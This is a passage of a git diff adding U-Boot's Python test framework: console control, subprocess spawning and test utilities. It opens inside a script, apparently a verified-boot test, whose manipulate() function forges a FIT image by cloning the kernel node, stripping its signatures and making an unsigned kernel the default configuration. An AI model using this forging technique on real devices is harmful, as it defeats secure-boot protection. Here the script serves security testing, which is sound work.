fp.write(structs) + + strings = compose_strings(strblock) + header.off_dt_strings = fp.tell() + header.size_dt_strings = len(strings) + fp.write(strings) + + header.totalsize = fp.tell() + + fp.seek(0) + fp.write(header.pack()) + +# +# pretty printing / converting to DT source +# + +def as_bytes(value): + return ' '.join(["%02X" % x for x in value]) + +def prety_print_value(value): + """ + Formats a property value as appropriate depending on the guessed data type + """ + if not value: + return '""' + if value[-1] == b'\x00': + printable = True + for x in value[:-1]: + x = ord(x) + if x != 0 and (x < 0x20 or x > 0x7F): + printable = False + break + if printable: + value = value[:-1] + return ', '.join('"' + x + '"' for x in value.split(b'\x00')) + if len(value) > 0x80: + return '[' + as_bytes(value[:0x80]) + ' ... ]' + return '[' + as_bytes(value) + ']' + +def pretty_print_r(node, strblock, indent=0): + """ + Prints out a single node, recursing further for each of its children + """ + spaces = ' ' * indent + print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/'))) + for p in node.props: + print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value)))) + for c in node.children: + pretty_print_r(c, strblock, indent+1) + print((spaces + '};')) + +def pretty_print(node, strblock): + """ + Generates an almost-DTS formatted printout of the parsed device tree + """ + print('/dts-v1/;') + pretty_print_r(node, strblock, 0) + +# +# manipulating the DT structure +# + +def manipulate(root, strblock): + """ + Maliciously manipulates the structure to create a crafted FIT file + """ + # locate /images/kernel-1 (frankly, it just expects it to be the first one) + kernel_node = root[0][0] + # clone it to save time filling all the properties + fake_kernel = kernel_node.clone() + # rename the node + fake_kernel.name = b'kernel-2' + # get rid of signatures/hashes + fake_kernel.children = [] + # NOTE: this simply replaces the first prop... either description or data + # should be good for testing purposes + fake_kernel.props[0].value = b'Super 1337 kernel\x00' + # insert the new kernel node under /images + root[0].children.append(fake_kernel) + + # modify the default configuration + root[1].props[0].value = b'conf-2\x00' + # clone the first (only?) configuration + fake_conf = root[1][0].clone() + # rename and change kernel and fdt properties to select the crafted kernel + fake_conf.name = b'conf-2' + fake_conf.props[0].value = b'kernel-2\x00' + fake_conf.props[1].value = b'fdt-1\x00' + # insert the new configuration under /configurations + root[1].children.append(fake_conf) + + return root, strblock + +def main(argv): + with open(argv[1], 'rb') as fp: + root, strblock = read_fdt(fp) + + print("Before:") + pretty_print(root, strblock) + + root, strblock = manipulate(root, strblock) + print("After:") + pretty_print(root, strblock) + + with open('blah', 'w+b') as fp: + write_fdt(root, strblock, fp) + +if __name__ == '__main__': + import sys + main(sys.argv) +# EOF diff --git a/test/py/u_boot_console_base.py b/test/py/u_boot_console_base.py new file mode 100644 index 00000000000..26b6de07f88 --- /dev/null +++ b/test/py/u_boot_console_base.py @@ -0,0 +1,515 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Common logic to interact with U-Boot via the console. This class provides +# the interface that tests use to execute U-Boot shell commands and wait for +# their results. Sub-classes exist to perform board-type-specific setup +# operations, such as spawning a sub-process for Sandbox, or attaching to the +# serial console of real hardware. + +import multiplexed_log +import os +import pytest +import re +import sys +import u_boot_spawn + +# Regexes for text we expect U-Boot to send to the console. +pattern_u_boot_spl_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_u_boot_spl2_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_u_boot_main_signon = re.compile('(U-Boot \\d{4}\\.\\d{2}[^\r\n]*\\))') +pattern_stop_autoboot_prompt = re.compile('Hit any key to stop autoboot: ') +pattern_unknown_command = re.compile('Unknown command \'.*\' - try \'help\'') +pattern_error_notification = re.compile('## Error: ') +pattern_error_please_reset = re.compile('### ERROR ### Please RESET the board ###') + +PAT_ID = 0 +PAT_RE = 1 + +bad_pattern_defs = ( + ('spl_signon', pattern_u_boot_spl_signon), + ('spl2_signon', pattern_u_boot_spl2_signon), + ('main_signon', pattern_u_boot_main_signon), + ('stop_autoboot_prompt', pattern_stop_autoboot_prompt), + ('unknown_command', pattern_unknown_command), + ('error_notification', pattern_error_notification), + ('error_please_reset', pattern_error_please_reset), +) + +class ConsoleDisableCheck(object): + """Context manager (for Python's with statement) that temporarily disables + the specified console output error check. This is useful when deliberately + executing a command that is known to trigger one of the error checks, in + order to test that the error condition is actually raised. This class is + used internally by ConsoleBase::disable_check(); it is not intended for + direct usage.""" + + def __init__(self, console, check_type): + self.console = console + self.check_type = check_type + + def __enter__(self): + self.console.disable_check_count[self.check_type] += 1 + self.console.eval_bad_patterns() + + def __exit__(self, extype, value, traceback): + self.console.disable_check_count[self.check_type] -= 1 + self.console.eval_bad_patterns() + +class ConsoleSetupTimeout(object): + """Context manager (for Python's with statement) that temporarily sets up + timeout for specific command. This is useful when execution time is greater + then default 30s.""" + + def __init__(self, console, timeout): + self.p = console.p + self.orig_timeout = self.p.timeout + self.p.timeout = timeout + + def __enter__(self): + return self + + def __exit__(self, extype, value, traceback): + self.p.timeout = self.orig_timeout + +class ConsoleBase(object): + """The interface through which test functions interact with the U-Boot + console. This primarily involves executing shell commands, capturing their + results, and checking for common error conditions. Some common utilities + are also provided too.""" + + def __init__(self, log, config, max_fifo_fill): + """Initialize a U-Boot console connection. + + Can only usefully be called by sub-classes. + + Args: + log: A mulptiplex_log.Logfile object, to which the U-Boot output + will be logged. + config: A configuration data structure, as built by conftest.py. + max_fifo_fill: The maximum number of characters to send to U-Boot + command-line before waiting for U-Boot to echo the characters + back. For UART-based HW without HW flow control, this value + should be set less than the UART RX FIFO size to avoid + overflow, assuming that U-Boot can't keep up with full-rate + traffic at the baud rate. + + Returns: + Nothing. + """ + + self.log = log + self.config = config + self.max_fifo_fill = max_fifo_fill + + self.logstream = self.log.get_stream('console', sys.stdout) + + # Array slice removes leading/trailing quotes + self.prompt = self.config.buildconfig['config_sys_prompt'][1:-1] + self.prompt_compiled = re.compile('^' + re.escape(self.prompt), re.MULTILINE) + self.p = None + self.disable_check_count = {pat[PAT_ID]: 0 for pat in bad_pattern_defs} + self.eval_bad_patterns() + + self.at_prompt = False + self.at_prompt_logevt = None + + def get_spawn(self): + # This is not called, ssubclass must define this. + # Return a value to avoid: + # u_boot_console_base.py:348:12: E1128: Assigning result of a function + # call, where the function returns None (assignment-from-none) + return u_boot_spawn.Spawn([]) + + + def eval_bad_patterns(self): + self.bad_patterns = [pat[PAT_RE] for pat in bad_pattern_defs \ + if self.disable_check_count[pat[PAT_ID]] == 0] + self.bad_pattern_ids = [pat[PAT_ID] for pat in bad_pattern_defs \ + if self.disable_check_count[pat[PAT_ID]] == 0] + + def close(self): + """Terminate the connection to the U-Boot console. + + This function is only useful once all interaction with U-Boot is + complete. Once this function is called, data cannot be sent to or + received from U-Boot. + + Args: + None. + + Returns: + Nothing. + """ + + if self.p: + self.p.close() + self.logstream.close() + + def wait_for_boot_prompt(self, loop_num = 1): + """Wait for the boot up until command prompt. This is for internal use only. + """ + try: + bcfg = self.config.buildconfig + config_spl = bcfg.get('config_spl', 'n') == 'y' + config_spl_serial = bcfg.get('config_spl_serial', 'n') == 'y' + env_spl_skipped = self.config.env.get('env__spl_skipped', False) + env_spl2_skipped = self.config.env.get('env__spl2_skipped', True) + + while loop_num > 0: + loop_num -= 1 + if config_spl and config_spl_serial and not env_spl_skipped: + m = self.p.expect([pattern_u_boot_spl_signon] + + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on SPL console: ' + + self.bad_pattern_ids[m - 1]) + if not env_spl2_skipped: + m = self.p.expect([pattern_u_boot_spl2_signon] + + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on SPL2 console: ' + + self.bad_pattern_ids[m - 1]) + m = self.p.expect([pattern_u_boot_main_signon] + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + self.u_boot_version_string = self.p.after + while True: + m = self.p.expect([self.prompt_compiled, + pattern_stop_autoboot_prompt] + self.bad_patterns) + if m == 0: + break + if m == 1: + self.p.send(' ') + continue + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 2]) + + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + + def run_command(self, cmd, wait_for_echo=True, send_nl=True, + wait_for_prompt=True, wait_for_reboot=False): + """Execute a command via the U-Boot console. + + The command is always sent to U-Boot. + + U-Boot echoes any command back to its output, and this function + typically waits for that to occur. The wait can be disabled by setting + wait_for_echo=False, which is useful e.g. when sending CTRL-C to + interrupt a long-running command such as "ums". + + Command execution is typically triggered by sending a newline + character. This can be disabled by setting send_nl=False, which is + also useful when sending CTRL-C. + + This function typically waits for the command to finish executing, and + returns the console output that it generated. This can be disabled by + setting wait_for_prompt=False, which is useful when invoking a long- + running command such as "ums". + + Args: + cmd: The command to send. + wait_for_echo: Boolean indicating whether to wait for U-Boot to + echo the command text back to its output. + send_nl: Boolean indicating whether to send a newline character + after the command string. + wait_for_prompt: Boolean indicating whether to wait for the + command prompt to be sent by U-Boot. This typically occurs + immediately after the command has been executed. + wait_for_reboot: Boolean indication whether to wait for the + reboot U-Boot. If this sets True, wait_for_prompt must also + be True. + + Returns: + If wait_for_prompt == False: + Nothing. + Else: + The output from U-Boot during command execution. In other + words, the text U-Boot emitted between the point it echod the + command string and emitted the subsequent command prompts. + """ + + if self.at_prompt and \ + self.at_prompt_logevt != self.logstream.logfile.cur_evt: + self.logstream.write(self.prompt, implicit=True) + + try: + self.at_prompt = False + if send_nl: + cmd += '\n' + while cmd: + # Limit max outstanding data, so UART FIFOs don't overflow + chunk = cmd[:self.max_fifo_fill] + cmd = cmd[self.max_fifo_fill:] + self.p.send(chunk) + if not wait_for_echo: + continue + chunk = re.escape(chunk) + chunk = chunk.replace('\\\n', '[\r\n]') + m = self.p.expect([chunk] + self.bad_patterns) + if m != 0: + self.at_prompt = False + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + if not wait_for_prompt: + return + if wait_for_reboot: + self.wait_for_boot_prompt() + else: + m = self.p.expect([self.prompt_compiled] + self.bad_patterns) + if m != 0: + self.at_prompt = False + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + self.at_prompt = True + self.at_prompt_logevt = self.logstream.logfile.cur_evt + # Only strip \r\n; space/TAB might be significant if testing + # indentation. + return self.p.before.strip('\r\n') + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + + def run_command_list(self, cmds): + """Run a list of commands. + + This is a helper function to call run_command() with default arguments + for each command in a list. + + Args: + cmd: List of commands (each a string). + Returns: + A list of output strings from each command, one element for each + command. + """ + output = [] + for cmd in cmds: + output.append(self.run_command(cmd)) + return output + + def ctrlc(self): + """Send a CTRL-C character to U-Boot. + + This is useful in order to stop execution of long-running synchronous + commands such as "ums". + + Args: + None. + + Returns: + Nothing. + """ + + self.log.action('Sending Ctrl-C') + self.run_command(chr(3), wait_for_echo=False, send_nl=False) + + def wait_for(self, text): + """Wait for a pattern to be emitted by U-Boot. + + This is useful when a long-running command such as "dfu" is executing, + and it periodically emits some text that should show up at a specific + location in the log file. + + Args: + text: The text to wait for; either a string (containing raw text, + not a regular expression) or an re object. + + Returns: + Nothing. + """ + + if type(text) == type(''): + text = re.escape(text) + m = self.p.expect([text] + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + + def drain_console(self): + """Read from and log the U-Boot console for a short time. + + U-Boot's console output is only logged when the test code actively + waits for U-Boot to emit specific data. There are cases where tests + can fail without doing this. For example, if a test asks U-Boot to + enable USB device mode, then polls until a host-side device node + exists. In such a case, it is useful to log U-Boot's console output + in case U-Boot printed clues as to why the host-side even did not + occur. This function will do that. + + Args: + None. + + Returns: + Nothing. + """ + + # If we are already not connected to U-Boot, there's nothing to drain. + # This should only happen when a previous call to run_command() or + # wait_for() failed (and hence the output has already been logged), or + # the system is shutting down. + if not self.p: + return + + orig_timeout = self.p.timeout + try: + # Drain the log for a relatively short time. + self.p.timeout = 1000 + # Wait for something U-Boot will likely never send. This will + # cause the console output to be read and logged. + self.p.expect(['This should never match U-Boot output']) + except: + # We expect a timeout, since U-Boot won't print what we waited + # for. Squash it when it happens. + # + # Squash any other exception too. This function is only used to + # drain (and log) the U-Boot console output after a failed test. + # The U-Boot process will be restarted, or target board reset, once + # this function returns. So, we don't care about detecting any + # additional errors, so they're squashed so that the rest of the + # post-test-failure cleanup code can continue operation, and + # correctly terminate any log sections, etc. + pass + finally: + self.p.timeout = orig_timeout + + def ensure_spawned(self, expect_reset=False): + """Ensure a connection to a correctly running U-Boot instance. + + This may require spawning a new Sandbox process or resetting target + hardware, as defined by the implementation sub-class. + + This is an internal function and should not be called directly. + + Args: + expect_reset: Boolean indication whether this boot is expected + to be reset while the 1st boot process after main boot before + prompt. False by default. + + Returns: + Nothing. + """ + + if self.p: + # Reset the console timeout value as some tests may change + # its default value during the execution + if not self.config.gdbserver: + self.p.timeout = 30000 + return + try: + self.log.start_section('Starting U-Boot') + self.at_prompt = False + self.p = self.get_spawn() + # Real targets can take a long time to scroll large amounts of + # text if LCD is enabled. This value may need tweaking in the + # future, possibly per-test to be optimal. This works for 'help' + # on board 'seaboard'. + if not self.config.gdbserver: + self.p.timeout = 30000 + self.p.logfile_read = self.logstream + if expect_reset: + loop_num = 2 + else: + loop_num = 1 + self.wait_for_boot_prompt(loop_num = loop_num) + self.at_prompt = True + self.at_prompt_logevt = self.logstream.logfile.cur_evt + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + self.log.end_section('Starting U-Boot') + + def cleanup_spawn(self): + """Shut down all interaction with the U-Boot instance. + + This is used when an error is detected prior to re-establishing a + connection with a fresh U-Boot instance. + + This is an internal function and should not be called directly. + + Args: + None. + + Returns: + Nothing. + """ + + try: + if self.p: + self.p.close() + except: + pass + self.p = None + + def restart_uboot(self, expect_reset=False): + """Shut down and restart U-Boot.""" + self.cleanup_spawn() + self.ensure_spawned(expect_reset) + + def get_spawn_output(self): + """Return the start-up output from U-Boot + + Returns: + The output produced by ensure_spawed(), as a string. + """ + if self.p: + return self.p.get_expect_output() + return None + + def validate_version_string_in_text(self, text): + """Assert that a command's output includes the U-Boot signon message. + + This is primarily useful for validating the "version" command without + duplicating the signon text regex in a test function. + + Args: + text: The command output text to check. + + Returns: + Nothing. An exception is raised if the validation fails. + """ + + assert(self.u_boot_version_string in text) + + def disable_check(self, check_type): + """Temporarily disable an error check of U-Boot's output. + + Create a new context manager (for use with the "with" statement) which + temporarily disables a particular console output error check. + + Args: + check_type: The type of error-check to disable. Valid values may + be found in self.disable_check_count above. + + Returns: + A context manager object. + """ + + return ConsoleDisableCheck(self, check_type) + + def temporary_timeout(self, timeout): + """Temporarily set up different timeout for commands. + + Create a new context manager (for use with the "with" statement) which + temporarily change timeout. + + Args: + timeout: Time in milliseconds. + + Returns: + A context manager object. + """ + + return ConsoleSetupTimeout(self, timeout) diff --git a/test/py/u_boot_console_exec_attach.py b/test/py/u_boot_console_exec_attach.py new file mode 100644 index 00000000000..8dd8cc1230c --- /dev/null +++ b/test/py/u_boot_console_exec_attach.py @@ -0,0 +1,72 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to interact with U-Boot running on real hardware, typically via a +physical serial port. +""" + +import sys +from u_boot_spawn import Spawn +from u_boot_console_base import ConsoleBase + +class ConsoleExecAttach(ConsoleBase): + """Represents a physical connection to a U-Boot console, typically via a + serial port. This implementation executes a sub-process to attach to the + console, expecting that the stdin/out of the sub-process will be forwarded + to/from the physical hardware. This approach isolates the test infra- + structure from the user-/installation-specific details of how to + communicate with, and the identity of, serial ports etc.""" + + def __init__(self, log, config): + """Initialize a U-Boot console connection. + + Args: + log: A multiplexed_log.Logfile instance. + config: A "configuration" object as defined in conftest.py. + + Returns: + Nothing. + """ + + # The max_fifo_fill value might need tweaking per-board/-SoC? + # 1 would be safe anywhere, but is very slow (a pexpect issue?). + # 16 is a common FIFO size. + # HW flow control would mean this could be infinite. + super(ConsoleExecAttach, self).__init__(log, config, max_fifo_fill=16) + + with self.log.section('flash'): + self.log.action('Flashing U-Boot') + cmd = ['u-boot-test-flash', config.board_type, config.board_identity] + runner = self.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + runner.close() + self.log.status_pass('OK') + + def get_spawn(self): + """Connect to a fresh U-Boot instance. + + The target board is reset, so that U-Boot begins running from scratch. + + Args: + None. + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + args = [self.config.board_type, self.config.board_identity] + s = Spawn(['u-boot-test-console'] + args) + + try: + self.log.action('Resetting board') + cmd = ['u-boot-test-reset'] + args + runner = self.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + runner.close() + except: + s.close() + raise + + return s diff --git a/test/py/u_boot_console_sandbox.py b/test/py/u_boot_console_sandbox.py new file mode 100644 index 00000000000..27c6db8d719 --- /dev/null +++ b/test/py/u_boot_console_sandbox.py @@ -0,0 +1,119 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to interact with the sandbox port of U-Boot, running as a sub-process. +""" + +import time +from u_boot_spawn import Spawn +from u_boot_console_base import ConsoleBase + +class ConsoleSandbox(ConsoleBase): + """Represents a connection to a sandbox U-Boot console, executed as a sub- + process.""" + + def __init__(self, log, config): + """Initialize a U-Boot console connection. + + Args: + log: A multiplexed_log.Logfile instance. + config: A "configuration" object as defined in conftest.py. + + Returns: + Nothing. + """ + + super(ConsoleSandbox, self).__init__(log, config, max_fifo_fill=1024) + self.sandbox_flags = [] + self.use_dtb = True + + def get_spawn(self): + """Connect to a fresh U-Boot instance. + + A new sandbox process is created, so that U-Boot begins running from + scratch. + + Args: + None. + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + bcfg = self.config.buildconfig + config_spl = bcfg.get('config_spl', 'n') == 'y' + config_vpl = bcfg.get('config_vpl', 'n') == 'y' + if config_vpl: + # Run TPL first, which runs VPL + fname = '/tpl/u-boot-tpl' + else: + fname = '/spl/u-boot-spl' if config_spl else '/u-boot' + print(fname) + cmd = [] + if self.config.gdbserver: + cmd += ['gdbserver', self.config.gdbserver] + cmd += [self.config.build_dir + fname, '-v'] + if self.use_dtb: + cmd += ['-d', self.config.dtb] + cmd += self.sandbox_flags + return Spawn(cmd, cwd=self.config.source_dir) + + def restart_uboot_with_flags(self, flags, expect_reset=False, use_dtb=True): + """Run U-Boot with the given command-line flags + + Args: + flags: List of flags to pass, each a string + expect_reset: Boolean indication whether this boot is expected + to be reset while the 1st boot process after main boot before + prompt. False by default. + use_dtb: True to use a device tree file, False to run without one + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + try: + self.sandbox_flags = flags + self.use_dtb = use_dtb + return self.restart_uboot(expect_reset) + finally: + self.sandbox_flags = [] + self.use_dtb = True + + def kill(self, sig): + """Send a specific Unix signal to the sandbox process. + + Args: + sig: The Unix signal to send to the process. + + Returns: + Nothing. + """ + + self.log.action('kill %d' % sig) + self.p.kill(sig) + + def validate_exited(self): + """Determine whether the sandbox process has exited. + + If required, this function waits a reasonable time for the process to + exit. + + Args: + None. + + Returns: + Boolean indicating whether the process has exited. + """ + + p = self.p + self.p = None + for i in range(100): + ret = not p.isalive() + if ret: + break + time.sleep(0.1) + p.close() + return ret diff --git a/test/py/u_boot_spawn.py b/test/py/u_boot_spawn.py new file mode 100644 index 00000000000..7c48d96210e --- /dev/null +++ b/test/py/u_boot_spawn.py @@ -0,0 +1,241 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to spawn a sub-process and interact with its stdio. +""" + +import os +import re +import pty +import signal +import select +import time +import traceback + +class Timeout(Exception): + """An exception sub-class that indicates that a timeout occurred.""" + +class Spawn: + """Represents the stdio of a freshly created sub-process. Commands may be + sent to the process, and responses waited for. + + Members: + output: accumulated output from expect() + """ + + def __init__(self, args, cwd=None): + """Spawn (fork/exec) the sub-process. + + Args: + args: array of processs arguments. argv[0] is the command to + execute. + cwd: the directory to run the process in, or None for no change. + + Returns: + Nothing. + """ + + self.waited = False + self.exit_code = 0 + self.exit_info = '' + self.buf = '' + self.output = '' + self.logfile_read = None + self.before = '' + self.after = '' + self.timeout = None + # http://stackoverflow.com/questions/7857352/python-regex-to-match-vt100-escape-sequences + self.re_vt100 = re.compile(r'(\x1b\[|\x9b)[^@-_]*[@-_]|\x1b[@-_]', re.I) + + (self.pid, self.fd) = pty.fork() + if self.pid == 0: + try: + # For some reason, SIGHUP is set to SIG_IGN at this point when + # run under "go" (www.go.cd). Perhaps this happens under any + # background (non-interactive) system? + signal.signal(signal.SIGHUP, signal.SIG_DFL) + if cwd: + os.chdir(cwd) + os.execvp(args[0], args) + except: + print('CHILD EXECEPTION:') + traceback.print_exc() + finally: + os._exit(255) + + try: + self.poll = select.poll() + self.poll.register(self.fd, select.POLLIN | select.POLLPRI | select.POLLERR | + select.POLLHUP | select.POLLNVAL) + except: + self.close() + raise + + def kill(self, sig): + """Send unix signal "sig" to the child process. + + Args: + sig: The signal number to send. + + Returns: + Nothing. + """ + + os.kill(self.pid, sig) + + def checkalive(self): + """Determine whether the child process is still running. + + Returns: + tuple: + True if process is alive, else False + 0 if process is alive, else exit code of process + string describing what happened ('' or 'status/signal n') + """ + + if self.waited: + return False, self.exit_code, self.exit_info + + w = os.waitpid(self.pid, os.WNOHANG) + if w[0] == 0: + return True, 0, 'running' + status = w[1] + + if os.WIFEXITED(status): + self.exit_code = os.WEXITSTATUS(status) + self.exit_info = 'status %d' % self.exit_code + elif os.WIFSIGNALED(status): + signum = os.WTERMSIG(status) + self.exit_code = -signum + self.exit_info = 'signal %d (%s)' % (signum, signal.Signals(signum).name) + self.waited = True + return False, self.exit_code, self.exit_info + + def isalive(self): + """Determine whether the child process is still running. + + Args: + None. + + Returns: + Boolean indicating whether process is alive. + """ + return self.checkalive()[0] + + def send(self, data): + """Send data to the sub-process's stdin. + + Args: + data: The data to send to the process. + + Returns: + Nothing. + """ + + os.write(self.fd, data.encode(errors='replace')) + + def expect(self, patterns): + """Wait for the sub-process to emit specific data. + + This function waits for the process to emit one pattern from the + supplied list of patterns, or for a timeout to occur. + + Args: + patterns: A list of strings or regex objects that we expect to + see in the sub-process' stdout. + + Returns: + The index within the patterns array of the pattern the process + emitted. + + Notable exceptions: + Timeout, if the process did not emit any of the patterns within + the expected time. + """ + + for pi in range(len(patterns)): + if type(patterns[pi]) == type(''): + patterns[pi] = re.compile(patterns[pi]) + + tstart_s = time.time() + try: + while True: + earliest_m = None + earliest_pi = None + for pi in range(len(patterns)): + pattern = patterns[pi] + m = pattern.search(self.buf) + if not m: + continue + if earliest_m and m.start() >= earliest_m.start(): + continue + earliest_m = m + earliest_pi = pi + if earliest_m: + pos = earliest_m.start() + posafter = earliest_m.end() + self.before = self.buf[:pos] + self.after = self.buf[pos:posafter] + self.output += self.buf[:posafter] + self.buf = self.buf[posafter:] + return earliest_pi + tnow_s = time.time() + if self.timeout: + tdelta_ms = (tnow_s - tstart_s) * 1000 + poll_maxwait = self.timeout - tdelta_ms + if tdelta_ms > self.timeout: + raise Timeout() + else: + poll_maxwait = None + events = self.poll.poll(poll_maxwait) + if not events: + raise Timeout() + try: + c = os.read(self.fd, 1024).decode(errors='replace') + except OSError as err: + # With sandbox, try to detect when U-Boot exits when it + # shouldn't and explain why. This is much more friendly than + # just dying with an I/O error + if err.errno == 5: # Input/output error + alive, _, info = self.checkalive() + if alive: + raise err + raise ValueError('U-Boot exited with %s' % info) + raise err + if self.logfile_read: + self.logfile_read.write(c) + self.buf += c + # count=0 is supposed to be the default, which indicates + # unlimited substitutions, but in practice the version of + # Python in Ubuntu 14.04 appears to default to count=2! + self.buf = self.re_vt100.sub('', self.buf, count=1000000) + finally: + if self.logfile_read: + self.logfile_read.flush() + + def close(self): + """Close the stdio connection to the sub-process. + + This also waits a reasonable time for the sub-process to stop running. + + Args: + None. + + Returns: + Nothing. + """ + + os.close(self.fd) + for _ in range(100): + if not self.isalive(): + break + time.sleep(0.1) + + def get_expect_output(self): + """Return the output read by expect() + + Returns: + The output processed by expect(), as a string. + """ + return self.output diff --git a/test/py/u_boot_utils.py b/test/py/u_boot_utils.py new file mode 100644 index 00000000000..9e161fbc238 --- /dev/null +++ b/test/py/u_boot_utils.py @@ -0,0 +1,382 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" +Utility code shared across multiple tests. +""" + +import hashlib +import inspect +import os +import os.path +import pathlib +import signal +import sys +import time +import re +import pytest + +def md5sum_data(data): + """Calculate the MD5 hash of some data. + + Args: + data: The data to hash. + + Returns: + The hash of the data, as a binary string. + """ + + h = hashlib.md5() + h.update(data) + return h.digest() + +def md5sum_file(fn, max_length=None): + """Calculate the MD5 hash of the contents of a file. + + Args: + fn: The filename of the file to hash. + max_length: The number of bytes to hash. If the file has more + bytes than this, they will be ignored. If None or omitted, the + entire file will be hashed. + + Returns: + The hash of the file content, as a binary string. + """ + + with open(fn, 'rb') as fh: + if max_length: + params = [max_length] + else: + params = [] + data = fh.read(*params) + return md5sum_data(data) + +class PersistentRandomFile: + """Generate and store information about a persistent file containing + random data.""" + + def __init__(self, u_boot_console, fn, size): + """Create or process the persistent file. + + If the file does not exist, it is generated. + + If the file does exist, its content is hashed for later comparison. + + These files are always located in the "persistent data directory" of + the current test run. + + Args: + u_boot_console: A console connection to U-Boot. + fn: The filename (without path) to create. + size: The desired size of the file in bytes. + + Returns: + Nothing. + """ + + self.fn = fn + + self.abs_fn = u_boot_console.config.persistent_data_dir + '/' + fn + + if os.path.exists(self.abs_fn): + u_boot_console.log.action('Persistent data file ' + self.abs_fn + + ' already exists') + self.content_hash = md5sum_file(self.abs_fn) + else: + u_boot_console.log.action('Generating ' + self.abs_fn + + ' (random, persistent, %d bytes)' % size) + data = os.urandom(size) + with open(self.abs_fn, 'wb') as fh: + fh.write(data) + self.content_hash = md5sum_data(data) + +def attempt_to_open_file(fn): + """Attempt to open a file, without throwing exceptions. + + Any errors (exceptions) that occur during the attempt to open the file + are ignored. This is useful in order to test whether a file (in + particular, a device node) exists and can be successfully opened, in order + to poll for e.g. USB enumeration completion. + + Args: + fn: The filename to attempt to open. + + Returns: + An open file handle to the file, or None if the file could not be + opened. + """ + + try: + return open(fn, 'rb') + except: + return None + +def wait_until_open_succeeds(fn): + """Poll until a file can be opened, or a timeout occurs. + + Continually attempt to open a file, and return when this succeeds, or + raise an exception after a timeout. + + Args: + fn: The filename to attempt to open. + + Returns: + An open file handle to the file. + """ + + for i in range(100): + fh = attempt_to_open_file(fn) + if fh: + return fh + time.sleep(0.1) + raise Exception('File could not be opened') + +def wait_until_file_open_fails(fn, ignore_errors): + """Poll until a file cannot be opened, or a timeout occurs. + + Continually attempt to open a file, and return when this fails, or + raise an exception after a timeout. + + Args: + fn: The filename to attempt to open. + ignore_errors: Indicate whether to ignore timeout errors. If True, the + function will simply return if a timeout occurs, otherwise an + exception will be raised. + + Returns: + Nothing. + """ + + for _ in range(100): + fh = attempt_to_open_file(fn) + if not fh: + return + fh.close() + time.sleep(0.1) + if ignore_errors: + return + raise Exception('File can still be opened') + +def run_and_log(u_boot_console, cmd, ignore_errors=False, stdin=None, env=None): + """Run a command and log its output. + + Args: + u_boot_console: A console connection to U-Boot. + cmd: The command to run, as an array of argv[], or a string. + If a string, note that it is split up so that quoted spaces + will not be preserved. E.g. "fred and" becomes ['"fred', 'and"'] + ignore_errors: Indicate whether to ignore errors. If True, the function + will simply return if the command cannot be executed or exits with + an error code, otherwise an exception will be raised if such + problems occur. + stdin: Input string to pass to the command as stdin (or None) + env: Environment to use, or None to use the current one + + Returns: + The output as a string. + """ + if isinstance(cmd, str): + cmd = cmd.split() + runner = u_boot_console.log.get_runner(cmd[0], sys.stdout) + output = runner.run(cmd, ignore_errors=ignore_errors, stdin=stdin, env=env) + runner.close() + return output + +def run_and_log_expect_exception(u_boot_console, cmd, retcode, msg): + """Run a command that is expected to fail. + + This runs a command and checks that it fails with the expected return code + and exception method. If not, an exception is raised. + + Args: + u_boot_console: A console connection to U-Boot. + cmd: The command to run, as an array of argv[]. + retcode: Expected non-zero return code from the command. + msg: String that should be contained within the command's output. + """ + try: + runner = u_boot_console.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + except Exception: + assert retcode == runner.exit_status + assert msg in runner.output + else: + raise Exception("Expected an exception with retcode %d message '%s'," + "but it was not raised" % (retcode, msg)) + finally: + runner.close() + +ram_base = None +def find_ram_base(u_boot_console): + """Find the running U-Boot's RAM location. + + Probe the running U-Boot to determine the address of the first bank + of RAM. This is useful for tests that test reading/writing RAM, or + load/save files that aren't associated with some standard address + typically represented in an environment variable such as + ${kernel_addr_r}. The value is cached so that it only needs to be + actively read once. + + Args: + u_boot_console: A console connection to U-Boot. + + Returns: + The address of U-Boot's first RAM bank, as an integer. + """ + + global ram_base + if u_boot_console.config.buildconfig.get('config_cmd_bdi', 'n') != 'y': + pytest.skip('bdinfo command not supported') + if ram_base == -1: + pytest.skip('Previously failed to find RAM bank start') + if ram_base is not None: + return ram_base + + with u_boot_console.log.section('find_ram_base'): + response = u_boot_console.run_command('bdinfo') + for l in response.split('\n'): + if '-> start' in l or 'memstart =' in l: + ram_base = 